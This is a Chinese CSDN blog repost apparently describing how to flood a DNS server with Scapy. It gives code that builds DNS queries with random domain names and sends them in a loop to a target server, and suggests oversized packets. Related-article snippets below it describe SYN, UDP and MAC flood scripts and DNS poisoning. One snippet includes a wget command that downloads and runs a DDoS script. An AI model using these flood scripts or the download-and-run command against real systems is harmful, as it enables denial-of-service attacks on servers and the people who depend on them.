Python中的Scapy初探之五-DNS洪水攻击

最新推荐文章于 2023-04-22 14:10:07 发布
最新推荐文章于 2023-04-22 14:10:07 发布
阅读量2.7k 收藏
点赞数
分类专栏: python 文章标签: python 网络
原文地址:Python中的Scapy初探之五-DNS洪水攻击作者:小牛牛

肿么回事,现在肿么都是这些东西?不过看了别人的代码,忍不住留个纪念,对生成随机的数据包有启发,其实,在Scapy有专门的洪水发包的方法

srflood             : Flood and receive packets at layer 3
srloop              : Send a packet at layer 3 in loop and print the answer each time
srp                 : Send and receive packets at layer 2
srp1                : Send and receive packets at layer 2 and return only the first answer
srpflood            : Flood and receive packets at layer 2
srploop             : Send a packet at layer 2 in loop and print the answer each time

改天有时间测试一下

那么如何对DNS服务器进行大量DNS名称解析呢?

首先要构建一个包含随机查询字符串的DNS请求包,主要还是添加qname项

qname一般包含FQDN名称,类似于www.baidu.com,要产生这种格式的名称,以'.'分隔三部分字符串

第一个s1,加上.,然后第二个s2,加上.,最后是第三个s3。那么可以随机产生字符串就ok了

s=RandString(RandNum(1,10))

s1=s.lower()

d=RandString(RandNum(1,10))

s2=d.lower()

t=RandString(RandNum(2,3))

s3=t.lower()

整合起来的字符串就是

q=s1+'.'+s2+'.'+s3

构建一个包

p=IP(dst='dns-server')/UDP(sport=RandShort())/DNS(rd=1,qd=DNSQR(qname=q))

然后send()出去

send(p)

如果可以接收数据包,那么使用srflood()是个不错的选择

send()可以只管发送,不管接收

再加上一个循环,就可以发送n多DNS请求包

想想看,如果将s1与s2的取值扩充成很大,那么发一个巨型的数据包,再循环一下....没看RFC文档,不知道一个DNS包的限定字节数是多少

看了一种方法,就是在TCP层之上,加上超容量的字符

例如TCP()/('xx'*6000000)

这样应该可以了,还没测试过,还需要继续验证

看来服务器的安全真是很重要,还没看到Linux的DNS配置,看看有什么防御方法不

http://www.packetlevel.ch/html/scapy/scapydns.html

http://www.packetlevel.ch/

txyj08
关注
专栏目录
python:实现SynFlood 洪水流量攻击(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-28 595
python:实现SynFlood 洪水流量攻击(附完整源码)
Python的DoS拒绝服务之TCP/SYN洪水攻击
深度学习领域优质创作者,CSDN博客专家
04-14 922
import socket,sys from struct import * def makeCheckSum(msg): s=0 for i in range(0,len(msg),2): #ord('a')=97 是chr()函数的配对函数,<<向左移动8位,乘以2的8次方 w=(ord(msg[i])<<8) + (...
python电脑攻击_python实现MAC洪水攻击
weixin_39923110的博客
12-21 322
前言:一般交换机在数据转发过程,依靠对CAM表的查询来确定正确的转发接口,如果在CAM表查询不到,则将该数据帧作为广播帧处理,CAM表存储数量有限,当数据到达上限之后将不会存储。根据此原理,可以通过在刷新时间内对其发送足够多的不同MAC地址的伪造数据包来占用CAM表,这种情况下,所有经过交换机的数据帧都会被作为广播帧处理,然后就可以获取到所有经过交换机的正常数据帧,并且交换机模式会降为Hub模...
Python-UDP-Flood:使用 python 进行的非常基本的 DOS 攻击
05-29
Python-UDP-洪水 使用 python 进行的非常基本的 DOS 攻击。 可以使用多台计算机将其转换为DDOS攻击。 我不对您使用此程序提供的使用负责。 它支持UDP和TCP 用法 下载或复制rundos.sh的脚本 也许你应该这样做才能让它发挥作用。 chmod +x rundos.sh 自动安装脚本 wget -O ddos.sh ' https://raw.githubusercontent.com/XaviFortes/Python-UDP-Flood/master/rundos.sh ' && chmod +x ddos.sh && ./ddos.sh 运行此代码并想再次打开它后,只需执行以下操作: ./ddos.sh 如果你想要一个自动更新的 bash 脚本(我认为它不会更新太多),把自动安装脚本放在一个 .sh 文件 视窗 如果你在 Windows 上
[笔记]使用Pythonscapy库实现SYN洪水攻击
qq_61690448的博客
12-22 2662
[笔记]实现SYN泛洪攻击
python scapy是什么_PythonScapy初探之四--DNS
weixin_39776787的博客
12-08 241
今天做了ARP缓存毒,又看到了DNS毒,觉得比较新鲜。Scapy还真不是盖的简单来说,DNS毒就是自己做一个应答的DNS包,发送给客户端,这样,客户端就毒了,因为不管发出什么DNS请求解析,得到的都是伪装的DNS应答包,这样就什么都访问不了鸟,这个做起来也非常的简单Scapy里面有一个工具,就是专门做DNS毒的,它就是dns_spoof(),这玩意非常好使,搞得我都上不了网了运行起来也很...
利用python+scapy抓取DNS数据包
06-04
程序只会抓取DNS数据包。不会去抓取其他类型的数据包!
python嗅探dhcp服务_PythonScapy初探之七--DHCP Server Daemon
weixin_39627481的博客
12-16 638
没想到在这个工具上花了这么长时间,已经超出了我的安排,主要是这个工具太令人激动了,以后完全可以把网络攻击啥的脚本化了。关于scapy,刚下载了很多很棒的ppt,那里面简直就是宝库啊。不过实在没时间去看了,因为下个月要考RHCE,在学习Python,不知不觉发现时间过的很快,Linux却落下了。还要交论文,时间根本不够用,所以Scapy就到此为止。把昨天看的一个模拟DHCPServer的小方法写上...
Python库 | scapy_helper-0.5.2-py2.py3-none-any.whl
02-19
要安装`scapy_helper`,首先确保你的Python环境已经安装了Scapy。然后,你可以使用`pip`来安装`.whl`文件: ```bash pip install scapy_helper-0.5.2-py2.py3-none-any.whl ``` 安装完成后,就可以在你的Python...
Python使用scapy模拟数据包实现arp攻击dns放大攻击例子
12-23
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试。 这里就直接用pythonscapy搞。 这里是arp的攻击方式,你可以做成arp攻击。 复制...
洪水淹没算法 洪水淹没算法洪水淹没算法
07-16
洪水淹没算法VB 洪水淹没算法洪水淹没算法洪水淹没算法
netkit-ng+bind+scapy的旁路抢答DNS污染实验报告
12-24
1.使用工具“netkit-ng”在虚拟机(kali linux 2016 amd64)里搭建模拟的网络环境 2.使用pythonscapy模块伪造DNS应答包,并发送给DNS缓存服务器(dns-local),从而污染DNS缓存服务器的缓存记录,使客户端(client)在访问域名“facebook.com”时,接收到来自DNS缓存服务器的已被攻击者污染的地址记录。最后使客户端实际访问到的是攻击者的web服务器(attserver)的网页。
python syn攻击
03-14
python语言实现 syn flood攻击
Python库 | scapy_helper-0.1.9-py3-none-any.whl
04-26
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:scapy_helper-0.1.9-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python实现SynFlood攻击
最新发布
带你成为别人眼中的大佬!
04-22 486
SynFlood攻击是一种常见的DoS攻击,它利用TCP协议的漏洞向目标服务器发送大量伪造的TCP连接请求(SYN包),目标服务器无法处理这些请求导致服务瘫痪。在本文,我们将使用Python编写一个简单的SynFlood程序,并对其进行讲解。其,将SO_REUSEADDR选项设置为1可以允许多个socket绑定同一个地址和端口,这样我们就可以向同一个目标IP地址和端口发送大量的SYN包。这里我们假设我们的源IP地址为1.2.3.4,实际上可以使用任意不存在的IP地址。现在,我们可以开始发送SYN包了。
Python 使用Scapy操作DNS流量
CSDN
10-07 7709
通常一个DNS数据包,客户端发送DNSQR请求包,服务器发送DNSRR响应包。一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。流量,解析DNSRR的数据包,提取分别含有查询的域名和对应的IP的rrname和rdata变量。这里只检查服务器53端口的数据包,DNS数据包有个rcode字段,当其值为3时表示域名不存在。
python - scapy - dns sniffer / posioning
热门推荐
Nixawk
05-23 1万+
How to parse dns request and response ? Scapy is a powerful tool, and it can help us for dns detail.#!/usr/bin/env python # -*- coding: utf8 -*-""" execte demo py with root privilege, and finish double
python scapy dns 包字段解析
weixin_30414155的博客
04-22 1210
qr:     0表示查询报文,1表示响应报文opcode:   通常值为0(标准查询),其他值为1(反向查询)和2(服务器状态请求)。aa:      表示授权回答(authoritative answer)tc:      表示可截断的(truncated)rcode:     返回码,通常为0(没有差错)和3(名字差错)表示期望递归ra:      表示可用递归z:      随后...
Python3与Scapy打造IEC-61850 GOOSE和SV通信实现
【压缩包子文件的文件名称列表】的"61850_SVGOOSE_Scapy-main"可能代表了包含主要实现代码的目录或项目名称。开发者在这个文件夹可能存放了Python脚本、Scapy脚本以及任何必要的配置文件,这些文件共同构成了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值